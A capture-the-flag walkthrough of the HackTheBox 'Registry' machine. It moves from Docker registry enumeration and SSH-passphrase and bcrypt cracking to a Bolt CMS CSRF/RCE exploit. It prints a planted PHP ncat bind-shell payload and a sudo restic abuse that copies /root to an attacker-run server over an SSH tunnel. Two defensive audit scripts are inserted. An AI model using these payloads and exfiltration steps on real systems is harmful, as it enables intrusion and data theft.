
RHOST: 10.10.10.159

LHOST: xx.xx.xx.xx

Initial Enumeration

As always, I started off with an nmap scan.

Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-06 08:44 EST
Nmap scan report for 10.10.10.159
Host is up (0.35s latency).
Not shown: 997 closed ports
PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp  open  http     nginx 1.14.0 (Ubuntu)
443/tcp open  ssl/http nginx 1.14.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 30.21 seconds

nginx webserver with HTTP and HTTPS ports open. Requests to both ports just led to the default nginx page. Since 443 has a self-signed cert, just like the Mango box, I took a look at the cert to see if we had another vhost set up we could go to.

There is a docker.registry.htb shown on the cert, so I added it to my /etc/hosts file, but all the requests returned was a 200 OK with no content.

I moved onto enumeration of URL paths with gobuster.

root@kali:~# /home/kali/go/bin/gobuster dir -u registry.htb -w /usr/share/wordlists/dirb/common.txt 
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://registry.htb
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirb/common.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2020/02/06 08:48:18 Starting gobuster
===============================================================
/.hta (Status: 403)
/.bash_history (Status: 403)
/.htaccess (Status: 403)
/.htpasswd (Status: 403)
/index.html (Status: 200)
/install (Status: 301)
/test (Status: 301)
===============================================================
2020/02/06 08:51:51 Finished
===============================================================

Found some paths of interest, /install and /test.

/test gave a 403 forbidden response, and /install returned some binary data.

root@kali:~# http --follow registry.htb/test
HTTP/1.1 403 Forbidden
Connection: keep-alive
Content-Encoding: gzip
Content-Type: text/html                                                                                                                                                        
Date: Thu, 06 Feb 2020 13:54:45 GMT                                                                                                                                            
Server: nginx/1.14.0 (Ubuntu)                                                                                                                                                  
Transfer-Encoding: chunked

<html>
<head><title>403 Forbidden</title></head>
<body bgcolor="white">
<center><h1>403 Forbidden</h1></center>
<hr><center>nginx/1.14.0 (Ubuntu)</center>
</body>
</html>

root@kali:~# http --follow registry.htb/install
HTTP/1.1 200 OK
Connection: keep-alive
Content-Encoding: gzip
Content-Type: text/html; charset=UTF-8
Date: Thu, 06 Feb 2020 13:54:52 GMT
Server: nginx/1.14.0 (Ubuntu)
Strict-Transport-Security: max-age=63072000; includeSubdomains
Transfer-Encoding: chunked
X-Content-Type-Options: nosniff
X-Frame-Options: DENY



+-----------------------------------------+
| NOTE: binary data not shown in terminal |
+-----------------------------------------+

I downloaded the binary data onto my system to take a closer look. It seemed to be a gzip'd archive.

root@kali:~# wget registry.htb/install
--2020-02-06 08:54:34--  http://registry.htb/install
Resolving registry.htb (registry.htb)... 10.10.10.159
Connecting to registry.htb (registry.htb)|10.10.10.159|:80... connected.
HTTP request sent, awaiting response... 301 Moved Permanently
Location: http://registry.htb/install/ [following]
--2020-02-06 08:54:34--  http://registry.htb/install/
Reusing existing connection to registry.htb:80.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [text/html]
Saving to: ‘install’

install                                         [ <=>                                                                                       ]   1.03K  --.-KB/s    in 0s      

2020-02-06 08:54:35 (56.6 MB/s) - ‘install’ saved [1050]

root@kali:~# file install
install: gzip compressed data, last modified: Mon Jul 29 23:38:20 2019, from Unix, original size modulo 2^32 167772200 gzip compressed data, reserved method, has CRC, was "", from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 167772200

I extracted the archive and found two files inside.

root@kali:~# tar -xvf install -C registry-binary/

gzip: stdin: unexpected end of file
ca.crt
readme.md
tar: Child returned status 1
tar: Error is not recoverable: exiting now
root@kali:~# ls registry-binary/
ca.crt  readme.md

A certificate and a readme file.

root@kali:~# cat registry-binary/ca.crt 
-----BEGIN CERTIFICATE-----
[certificate body omitted]
-----END CERTIFICATE-----
root@kali:~# cat registry-binary/readme.md 
# Private Docker Registry

- https://docs.docker.com/registry/deploying/
- https://docs.docker.com/engine/security/certificates/

Looks like the docker subdomain we found at the start is relevant after all. I've had some experience with docker before, but docker registries are a new concept to me. Time to do some reading!

Docker registry

OK, so after reading the manual a bit, I now know a docker registry contains docker images, and you can self-host docker registries. Evidently there's a self-hosted docker registry at docker.registry.htb which we need to access.

There's an HTTP API available with docker registry, but unfortunately in our case the registry has authentication enabled.

root@kali:~# http --verify=no https://docker.registry.htb/v2/
HTTP/1.1 401 Unauthorized
Connection: keep-alive
Content-Length: 87
Content-Type: application/json; charset=utf-8
Date: Thu, 06 Feb 2020 14:23:43 GMT
Docker-Distribution-Api-Version: registry/2.0
Server: nginx/1.14.0 (Ubuntu)
Www-Authenticate: Basic realm="Registry"
X-Content-Type-Options: nosniff

{
    "errors": [
        {
            "code": "UNAUTHORIZED",
            "detail": null,
            "message": "authentication required"
        }
    ]
}

In order to log in to the docker registry we use the docker login command. I'll try admin:admin.

root@kali:~# docker login docker.registry.htb
Username: admin
Password: 
Error response from daemon: Get https://docker.registry.htb/v2/: x509: certificate signed by unknown authority

The cert from the registry is self-signed, so the login command doesn't work OOTB. Luckily we came across the cert earlier from the /install path, and from the docs linked in the readme.md file I know to place it in /etc/docker/certs.d/docker.register.domain/.

root@kali:~# mkdir -p /etc/docker/certs.d/docker.registry.htb/
root@kali:~# mv /etc/docker/certs.d/
root@kali:~# mv /etc/docker/certs.d/ca.crt /etc/docker/certs.d/docker.registry.htb/
root@kali:~# docker login docker.registry.htb
Username: admin
Password: 
WARNING! Your password will be stored unencrypted in /root/.docker/config.json.
Configure a credential helper to remove this warning. See
https://docs.docker.com/engine/reference/commandline/login/#credentials-store

Login Succeeded

Yay! We managed to login on the first try with the creds admin:admin.

Since we have working credentials for the docker registry, let's return to the HTTP API and see what the registry contains.

root@kali:~# http --verify=registry-binary/ca.crt -a admin:admin https://docker.registry.htb/v2/
HTTP/1.1 200 OK
Connection: keep-alive
Content-Length: 2
Content-Type: application/json; charset=utf-8
Date: Thu, 06 Feb 2020 15:53:21 GMT
Docker-Distribution-Api-Version: registry/2.0
Server: nginx/1.14.0 (Ubuntu)
Strict-Transport-Security: max-age=63072000; includeSubdomains
X-Content-Type-Options: nosniff
X-Content-Type-Options: nosniff
X-Frame-Options: DENY

{}

root@kali:~# http --verify=registry-binary/ca.crt -a admin:admin https://docker.registry.htb/v2/_catalog
HTTP/1.1 200 OK
Connection: keep-alive
Content-Length: 32
Content-Type: application/json; charset=utf-8
Date: Thu, 06 Feb 2020 15:54:42 GMT
Docker-Distribution-Api-Version: registry/2.0
Server: nginx/1.14.0 (Ubuntu)
Strict-Transport-Security: max-age=63072000; includeSubdomains
X-Content-Type-Options: nosniff
X-Content-Type-Options: nosniff
X-Frame-Options: DENY

{
    "repositories": [
        "bolt-image"
    ]
}

OK, looks like there's an image we can pull called bolt-image, so let's pull it from the registry.

root@kali:~# docker pull docker.registry.htb/bolt-image
Using default tag: latest
latest: Pulling from bolt-image
f476d66f5408: Pull complete 
8882c27f669e: Pull complete 
d9af21273955: Pull complete 
f5029279ec12: Pull complete 
2931a8b44e49: Pull complete 
c71b0b975ab8: Pull complete 
02666a14e1b5: Pull complete 
3f12770883a6: Pull complete 
302bfcb3f10c: Pull complete 
Digest: sha256:eeff225e5fae33dc832c3f82fd8b0db363a73eac4f0f0cb587094be54050539b
Status: Downloaded newer image for docker.registry.htb/bolt-image:latest
docker.registry.htb/bolt-image:latest

Now let's run the docker image and attach ourselves to the running bolt-image container.

root@kali:~# docker run -d -it -p 80:80 docker.registry.htb/bolt-image
69fcf6aa5ea422306bcd9d8ad5030ee3f02b82d395c06990197b2a67d97abbb9
root@kali:~# docker attach 69fcf6aa5ea422306bcd9d8ad5030ee3f02b82d395c06990197b2a67d97abbb9
root@69fcf6aa5ea4:/# 

Finding secrets in the dev environment

Alright let's have a closer look. Since this seems to be an image for the Bolt CMS system, my first instinct is to look at the /var/www directory.

root@69fcf6aa5ea4:/# ls /var/www/html/
index.html  sync.sh

OK, just one html file and a bash script called sync.sh.

root@69fcf6aa5ea4:/# cat /var/www/html/sync.sh 
#!/bin/bash
rsync -azP registry:/var/www/html/bolt .

rsync uses the same syntax as ssh, so looking at the ssh config file we can see what is set up for the host named registry.

root@69fcf6aa5ea4:/# cat /root/.ssh/config 
Host registry
  User bolt
  Port 22
  Hostname registry.htb

So running the sync.sh script will copy the bolt directory over from registry.htb using the user bolt. Let's give it a shot.

root@69fcf6aa5ea4:/# bash /var/www/html/sync.sh 
ssh: Could not resolve hostname registry.htb: Name or service not known
rsync: connection unexpectedly closed (0 bytes received so far) [Receiver]
rsync error: unexplained error (code 255) at io.c(235) [Receiver=3.1.2]
root@69fcf6aa5ea4:/# echo '10.10.10.159 registry.htb' >> /etc/hosts
root@69fcf6aa5ea4:/# bash /var/www/html/sync.sh 
Warning: Permanently added the ECDSA host key for IP address '10.10.10.159' to the list of known hosts.
Enter passphrase for key '/root/.ssh/id_rsa': 

Oops, looks like we need a passphrase to unlock the RSA key.

root@69fcf6aa5ea4:/# cat /root/.ssh/id_rsa
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,1C98FA248505F287CCC597A59CF83AB9
[key body omitted]
-----END RSA PRIVATE KEY-----
root@69fcf6aa5ea4:/# 

Let's get our familiar friend john to give us a hand.

root@kali:~# john --wordlist=/usr/share/wordlists/rockyou.txt bolt_hash 
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 4 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
Warning: Only 2 candidates left, minimum 4 needed for performance.
0g 0:00:00:04 DONE (2020-02-06 11:27) 0g/s 3304Kp/s 3304Kc/s 3304KC/sa6_123..*7¡Vamos!
Session completed

Shit... no luck with the rockyou.txt wordlist. I tried a few more wordlists.

root@kali:~# john --wordlist=/root/all.txt bolt_hash 
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 4 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:01 DONE (2020-02-06 11:40) 0g/s 3410Kp/s 3410Kc/s 3410KC/s {kjhfn..{ysrfk
Session completed
root@kali:~# john --wordlist=/root/Downloads/crackstation-human-only.txt bolthash 
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 4 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
Warning: Only 1 candidate left, minimum 4 needed for performance.
0g 0:00:00:21 DONE (2020-02-06 11:54) 0g/s 2906Kp/s 2906Kc/s 2906KC/s ����
Session completed
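As an added example (not part of the original write-up), this Python script reads the header fields of a private key file and reports how the passphrase is protected: the legacy PEM form above (Proc-Type/DEK-Info) derives the key with a single MD5 pass over the passphrase, which is what john's "KDF/cipher ... is 0" and "iteration count ... is 1" lines refer to and why it can test millions of candidates per second, while the openssh-key-v1 format carries a bcrypt KDF with a configurable round count. The `build_openssh_header` helper, the `LEGACY_SAMPLE` (header only, key material omitted) and the 16-round threshold are my own constructions for the demonstration.

```python
"""Report how an OpenSSH/PEM private key file protects its key material."""
import base64
import re
import struct

LEGACY_HDR = re.compile(r"^-----BEGIN (RSA|DSA|EC) PRIVATE KEY-----", re.M)
OPENSSH_HDR = "-----BEGIN OPENSSH PRIVATE KEY-----"
MIN_BCRYPT_ROUNDS = 16  # ssh-keygen's default; assumed threshold for this example


def _ssh_string(data):
    """Encode bytes as an SSH wire-format string (uint32 length + bytes)."""
    return struct.pack(">I", len(data)) + data


def _read_string(buf, off):
    """Decode an SSH wire-format string at off; returns (bytes, new_off)."""
    (n,) = struct.unpack(">I", buf[off:off + 4])
    return buf[off + 4:off + 4 + n], off + 4 + n


def inspect_key(key_text):
    """Return format, cipher, KDF, round count and a weak/strong verdict."""
    if LEGACY_HDR.search(key_text):
        encrypted = "Proc-Type: 4,ENCRYPTED" in key_text
        m = re.search(r"^DEK-Info:\s*([A-Za-z0-9-]+),", key_text, re.M)
        return {
            "format": "pem-legacy",
            "encrypted": encrypted,
            "cipher": m.group(1) if m else None,
            # PEM encryption derives the key with one MD5 pass over passphrase
            # and salt (OpenSSL EVP_BytesToKey), so guesses are very cheap.
            "kdf": "md5-evp-bytestokey" if encrypted else None,
            "rounds": 1 if encrypted else 0,
            "weak": True,
        }
    if OPENSSH_HDR in key_text:
        body = key_text.split(OPENSSH_HDR, 1)[1].split("-----END", 1)[0]
        blob = base64.b64decode("".join(body.split()))
        magic = b"openssh-key-v1\x00"
        if not blob.startswith(magic):
            raise ValueError("bad openssh-key-v1 magic")
        cipher, off = _read_string(blob, len(magic))
        kdf, off = _read_string(blob, off)
        kdfopts, off = _read_string(blob, off)
        rounds = 0
        if kdf == b"bcrypt":  # kdfoptions = string salt, uint32 rounds
            _salt, o = _read_string(kdfopts, 0)
            (rounds,) = struct.unpack(">I", kdfopts[o:o + 4])
        encrypted = cipher != b"none"
        return {
            "format": "openssh-key-v1",
            "encrypted": encrypted,
            "cipher": cipher.decode(),
            "kdf": kdf.decode(),
            "rounds": rounds,
            "weak": not encrypted or rounds < MIN_BCRYPT_ROUNDS,
        }
    raise ValueError("unrecognised private key format")


def build_openssh_header(cipher=b"aes256-ctr", kdf=b"bcrypt", rounds=100):
    """Constructed openssh-key-v1 file holding only the header fields (no key
    material); enough for inspect_key to read cipher, KDF and rounds."""
    kdfopts = b""
    if kdf == b"bcrypt":
        kdfopts = _ssh_string(b"\x00" * 16) + struct.pack(">I", rounds)
    blob = b"openssh-key-v1\x00" + _ssh_string(cipher) + _ssh_string(kdf) + _ssh_string(kdfopts)
    return OPENSSH_HDR + "\n" + base64.b64encode(blob).decode() + "\n-----END OPENSSH PRIVATE KEY-----\n"


# Constructed sample mirroring the header of the key found in the container
# (key material omitted; the DEK-Info IV is the one printed above).
LEGACY_SAMPLE = """-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,1C98FA248505F287CCC597A59CF83AB9

-----END RSA PRIVATE KEY-----
"""

if __name__ == "__main__":
    print(inspect_key(LEGACY_SAMPLE))
    print(inspect_key(build_openssh_header()))
```

Keys that report `pem-legacy` can be re-encrypted in place with `ssh-keygen -p -o -a 100 -f <keyfile>`, which switches to the openssh-key-v1 format with 100 bcrypt rounds.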

I did a search for bash scripts on the system and found an interesting one, /etc/profile.d/01-ssh.sh. The use case seems to be adding the RSA key to ssh-agent so the user doesn't have to type their passphrase every time the key is used. Now we have the ssh key passphrase: GkOcz221Ftb3ugog!

root@69fcf6aa5ea4:/# find / -name '*.sh'
/etc/init.d/hwclock.sh
/etc/profile.d/01-locale-fix.sh
/etc/profile.d/01-ssh.sh
/lib/init/vars.sh
/var/www/html/sync.sh
/usr/share/debconf/confmodule.sh
/usr/share/vim/vim80/macros/less.sh
root@69fcf6aa5ea4:/# cat /etc/profile.d/01-ssh.sh
#!/usr/bin/expect -f
#eval `ssh-agent -s`
spawn ssh-add /root/.ssh/id_rsa
expect "Enter passphrase for /root/.ssh/id_rsa:"
send "GkOcz221Ftb3ugog\n";
expect "Identity added: /root/.ssh/id_rsa (/root/.ssh/id_rsa)"
interact
root@69fcf6aa5ea4:/#

I ssh'd into the registry box and grabbed the user flag.

root@69fcf6aa5ea4:/# ssh registry       
Enter passphrase for key '/root/.ssh/id_rsa': 
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-65-generic x86_64)

  System information as of Thu Feb  6 17:23:23 UTC 2020

  System load:  0.0               Users logged in:                0
  Usage of /:   5.7% of 61.80GB   IP address for eth0:            10.10.10.159
  Memory usage: 24%               IP address for br-1bad9bd75d17: 172.18.0.1
  Swap usage:   0%                IP address for docker0:         172.17.0.1
  Processes:    153
Last login: Thu Feb  6 16:06:42 2020 from 10.10.14.55
bolt@bolt:~$ ls
user.txt
bolt@bolt:~$ cat user.txt
ytc0ytdmnzywnzgxngi0zte0otm3ywzi

Hol' up back it up there

Again I headed to /var/www since the box is running Bolt CMS. I came across a SQLite db file, as well as a backup.php, which looked interesting.

bolt@bolt:~$ ls -lah /var/www/html
total 28K
drwxrwxr-x  4 www-data www-data 4.0K Oct 21 08:41 .
drwxr-xr-x  4 root     root     4.0K May 26  2019 ..
-rw-r--r--  1 root     root       85 May 25  2019 backup.php
-rw-------  1 git      www-data    0 Oct  8 21:54 .bash_history
drwxrwxr-x 11 www-data www-data 4.0K Oct 21 08:27 bolt
-rwxrwxr-x  1 www-data www-data  612 May  6  2019 index.html
-rw-r--r--  1 root     root      612 Oct 21 08:41 index.nginx-debian.html
drwxr-xr-x  2 root     root     4.0K Sep 26 21:13 install
bolt@bolt:~$ ls /var/www/html/bolt/
app           codeception.yml  composer.lock    extensions  index.php   phpunit.xml.dist  src    theme
changelog.md  composer.json    CONTRIBUTING.md  files       LICENSE.md  README.md         tests  vendor
bolt@bolt:~$ ls /var/www/html/bolt/app
bootstrap.php  cache  config  database  deprecated.php  nut  resources  src  theme_defaults  view  web.php
bolt@bolt:~$ ls /var/www/html/bolt/app/database/
bolt.db
bolt@bolt:~$ file /var/www/html/bolt/app/database/bolt.db 
/var/www/html/bolt/app/database/bolt.db: SQLite 3.x database, last written using SQLite version 3022000
bolt@bolt:~$ ls -lah /var/www/html/bolt/app/database/bolt.db
-rw-r--r-- 1 www-data www-data 288K Feb  7 07:55 /var/www/html/bolt/app/database/bolt.db

First let's look at the backup.php file.

bolt@bolt:~$ cat /var/www/html/backup.php 
<?php shell_exec("sudo restic backup -r rest:http://backup.registry.htb/bolt bolt");
bolt@bolt:~$ 

Looks like a certain user on the system can run restic with root privileges. I tried with bolt but no luck, so I'm assuming we need to pivot over to www-data. Seems I'll need to create my own restic server later and use sudo restic to transfer the root flag over.

Next I pulled the sqlite db file down to my localhost to peek inside.

root@kali:~# scp -i boltkey [email protected]:/var/www/html/bolt/app/database/bolt.db bolt.db
Enter passphrase for key 'boltkey': 
bolt.db                                                                                                                                      100%  288KB  46.9KB/s   00:06    
root@kali:~# sqlite3 bolt.db 
SQLite version 3.31.0 2019-12-29 00:52:41
Enter ".help" for usage hints.
sqlite> .tables
bolt_authtoken    bolt_field_value  bolt_pages        bolt_users      
bolt_blocks       bolt_homepage     bolt_relations  
bolt_cron         bolt_log_change   bolt_showcases  
bolt_entries      bolt_log_system   bolt_taxonomy   
sqlite> select * from bolt_users;
1|admin|$2y$10$e.ChUytg9SrL7AsboF2bX.wWKQ1LkS5Fi3/Z0yYD86.P5E9cpY7PK|[email protected]|2020-02-07 07:56:30|10.10.14.153|Admin|["files://nosus.php"]|1||||0||["root","everyone"]
sqlite> 

Dank. We got a hash for the Bolt CMS admin password. We can see $2y$ at the start, so it's hashed with bcrypt. A little help from john again.

root@kali:~# echo '$2y$10$e.ChUytg9SrL7AsboF2bX.wWKQ1LkS5Fi3/Z0yYD86.P5E9cpY7PK' > boltpwhash
root@kali:~# john --format=bcrypt --wordlist=/usr/share/wordlists/rockyou.txt boltpwhash 
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 1024 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
strawberry       (?)
1g 0:00:00:03 DONE (2020-02-07 03:22) 0.2890g/s 104.0p/s 104.0c/s 104.0C/s strawberry..brianna
Use the "--show" option to display all of the cracked passwords reliably
Session completed
root@kali:~# 

And we got the creds admin:strawberry. I tried the password strawberry on the registry box user bolt but no luck. So I just used the creds to log in to the Bolt CMS admin portal, since there are exploits available for authenticated users.

root@kali:~# searchsploit bolt
-------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
 Exploit Title                                                                                                                        |  Path
                                                                                                                                      | (/usr/share/exploitdb/)
-------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Apple WebKit - 'JSC::SymbolTableEntry::isWatchable' Heap Buffer Overflow                                                              | exploits/multiple/dos/41869.html
Bolt CMS 3.6.10 - Cross-Site Request Forgery                                                                                          | exploits/php/webapps/47501.txt
Bolt CMS 3.6.4 - Cross-Site Scripting                                                                                                 | exploits/php/webapps/46495.txt
Bolt CMS 3.6.6 - Cross-Site Request Forgery / Remote Code Execution                                                                   | exploits/php/webapps/46664.html
Bolt CMS < 3.6.2 - Cross-Site Scripting                                                                                               | exploits/php/webapps/46014.txt
BoltWire 3.4.16 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities                                                           | exploits/php/webapps/36552.txt
Bolthole Filter 2.6.1 - Address Parsing Buffer Overflow                                                                               | exploits/multiple/remote/24982.txt
CMS Bolt - Arbitrary File Upload (Metasploit)                                                                                         | exploits/php/remote/38196.rb
Cannonbolt Portfolio Manager 1.0 - Multiple Vulnerabilities                                                                           | exploits/php/webapps/21132.txt
-------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result
root@kali:~# 

Reverse reverse shell

I used the exploit that leverages CSRF for RCE detailed in /usr/share/exploitdb/exploits/php/webapps/46664.html. There was one big wall in the way though: the box was set up so that it couldn't initiate any outgoing connections. That meant I couldn't use a reverse shell, as I couldn't dial out to my localhost from the registry box. Instead of a reverse shell, I used a netcat bind shell. The nc binary on the remote host was compiled without the -e flag enabled, so I grabbed a prebuilt statically linked binary from here and scp'd it over. Then, using the CSRF/RCE technique, I uploaded my malicious php script into the bolt upload directory.

<?php exec("/tmp/ncat -vnlp 8888 -e /bin/bash"); ?>

I then dialed into the remote host from my local machine, and used the python pty trick to get a fully interactive shell as www-data.

root@kali:~# nc registry.htb 8888
python -c 'import pty; pty.spawn("/bin/bash")'
www-data@bolt:~/html/bolt/files/2020-02$ ^Z
[1]+  Stopped                 nc registry.htb 8888
root@kali:~# stty raw -echo
root@kali:~# nc registry.htb 8888
www-data@bolt:~/html/bolt/files/2020-02$ 

We saw earlier in the backup.php file that we could probably use the restic command with sudo, and checking sudo -l confirmed this. Now we just needed to do some careful manipulation in order to run restic as root to be able to read and transfer /root back to our localhost.

www-data@bolt:~/html/bolt/files/2020-02$ sudo -l
Matching Defaults entries for www-data on bolt:
    env_reset, exempt_group=sudo, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on bolt:
    (root) NOPASSWD: /usr/bin/restic backup -r rest*
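As an added example (not from the original write-up), the following Python checker parses sudoers-style rule lines and flags the pattern the sudo -l output above exposes: a file-copying tool runnable as root, with a wildcarded argument that lets the caller choose where the data goes. The `FILE_COPY_TOOLS` list and the sample rules other than the www-data one are my own constructions.

```python
"""Flag sudo rules that hand out a root-level read-any-file primitive."""
import re
import shlex

# Tools whose job is to read or copy arbitrary files.  Constructed list, not
# exhaustive; running one of these as root with a caller-chosen destination
# is equivalent to "read any file as root".
FILE_COPY_TOOLS = {"restic", "rsync", "tar", "cp", "dd", "scp", "borg", "zip"}

# user host=(runas) TAG: cmd, cmd   (simplified single-line sudoers grammar)
RULE_RE = re.compile(
    r"^\s*(?P<user>\S+)\s+(?P<host>[^\s=]+)\s*=\s*"
    r"(?:\((?P<runas>[^)]*)\)\s*)?"
    r"(?P<tags>(?:[A-Z_]+:\s*)*)"
    r"(?P<cmds>.+?)\s*$"
)


def audit_rule(line):
    """Return a list of finding strings for one sudoers rule ([] if clean)."""
    stripped = line.strip()
    if not stripped or stripped.startswith(("#", "Defaults")):
        return []
    m = RULE_RE.match(line)
    if not m:
        return [f"unparsed rule: {stripped}"]
    user = m.group("user")
    runas = (m.group("runas") or "root").split(":")[0]  # sudoers default runas
    nopasswd = "NOPASSWD:" in m.group("tags")
    findings = []
    for cmd in m.group("cmds").split(","):
        cmd = cmd.strip()
        if cmd == "ALL":
            findings.append(f"{user}: ALL commands as {runas}")
            continue
        prog = shlex.split(cmd)[0].rsplit("/", 1)[-1]
        # sudoers matches the arguments as one concatenated string, so a '*'
        # also matches spaces and therefore any extra trailing arguments.
        wildcard = any(ch in cmd for ch in "*?[")
        if prog in FILE_COPY_TOOLS and runas in ("root", "ALL"):
            why = f"{user}: {prog} as {runas} can read any file on the host"
            if wildcard:
                why += "; wildcard argument lets the caller choose the destination"
            if nopasswd:
                why += "; NOPASSWD"
            findings.append(why)
        elif wildcard:
            findings.append(f"{user}: wildcard in '{cmd}' matches across argument boundaries")
    return findings


def audit_sudoers(text):
    """Audit every rule in a sudoers-style text and return all findings."""
    out = []
    for line in text.splitlines():
        out.extend(audit_rule(line))
    return out


# Constructed sample: the www-data rule is the one from the box; the others
# are made up to show a clean rule and a wildcard-only rule.
SAMPLE_SUDOERS = """\
Defaults env_reset, secure_path=/usr/local/sbin:/usr/bin:/bin
www-data ALL=(root) NOPASSWD: /usr/bin/restic backup -r rest*
bolt ALL=(root) /usr/bin/systemctl restart nginx
deploy ALL=(root) NOPASSWD: /usr/bin/apt-get install *
"""

if __name__ == "__main__":
    for finding in audit_sudoers(SAMPLE_SUDOERS):
        print(finding)
```

A rule that only ever needs to reach one repository should spell out the full repository URL and source path with no wildcards, or move the whole backup into a root-owned script that takes no arguments.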

First I set up rest-server on my localhost, initialized a restic repo and started the server.

root@kali:~# restic init --repo /root/restic-shit/
enter password for new repository: 
enter password again: 
created restic repository 97b64df299 at /root/restic-shit/

Please note that knowledge of your password is required to access
the repository. Losing your password means that your data is
irrecoverably lost.

root@kali:~# rest-server --no-auth --path /root/restic-shit
Data directory: /root/restic-shit
Authentication disabled
Private repositories disabled
Starting server on :8000

Then I used ssh to remote forward port 8000 to the registry box since it couldn't dial out to my box. This meant that I could point to localhost:8000 on the remote host and have it resolve back to my actual localhost:8000.

ssh -N -R 8000:localhost:8000 -i boltkey [email protected]

Now to copy over the /root directory.

www-data@bolt:~/html/bolt/files/2020-02$ sudo restic backup -r rest:http://localhost:8000 /root/
enter password for repository: 
password is correct
found 2 old cache directories in /var/www/.cache/restic, pass --cleanup-cache to remove them
scan [/root]
scanned 10 directories, 14 files in 0:00
[0:03] 100.00%  28.066 KiB / 28.066 KiB  24 / 24 items  0 errors  ETA 0:00 
duration: 0:03
snapshot 0db157c0 saved
www-data@bolt:~/html/bolt/files/2020-02$ ping 10.10.15.7

Checking the restic backups on my localhost, I can see that the /root dir from the remote host is there. Now I just need to restore it to a location on my localhost and read the files.

root@kali:~# restic -r rest:http://localhost:8000/ snapshots
enter password for repository: 
repository 97b64df2 opened successfully, password is correct
ID        Time                 Host        Tags        Paths
---------------------------------------------------------------------
0db157c0  2020-02-07 11:41:46  bolt                    /root
---------------------------------------------------------------------
2 snapshots
root@kali:~# restic -r rest:http://localhost:8000/ restore 0db --target /tmp/restore
enter password for repository: 
repository 97b64df2 opened successfully, password is correct
restoring <Snapshot 0db157c0 of [/root] at 2020-02-07 16:41:46.2119485 +0000 UTC by root@bolt> to /tmp/restore
root@kali:~# ls /tmp/restore/
root
root@kali:~# cd /tmp/restore/root/
root@kali:/tmp/restore/root# ls
config.yml  cron.sh  root.txt
root@kali:/tmp/restore/root# cat root.txt 
ntrkzgnkotaxyju0ntrinda4yzbkztgw

Since we also grabbed the private key for root, we can also log in via ssh!

root@kali:/tmp/restore/root# cat .ssh/id_rsa
-----BEGIN RSA PRIVATE KEY-----
[key body omitted]
-----END RSA PRIVATE KEY-----
root@kali:/tmp/restore/root# ssh -i .ssh/id_rsa [email protected]
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-65-generic x86_64)

  System information as of Fri Feb  7 17:14:55 UTC 2020

  System load:  0.0               Users logged in:                2
  Usage of /:   5.7% of 61.80GB   IP address for eth0:            10.10.10.159
  Memory usage: 43%               IP address for docker0:         172.17.0.1
  Swap usage:   0%                IP address for br-1bad9bd75d17: 172.18.0.1
  Processes:    172
Last login: Fri Feb  7 16:58:08 2020 from 10.10.15.7
root@bolt:~# id
uid=0(root) gid=0(root) groups=0(root)
root@bolt:~#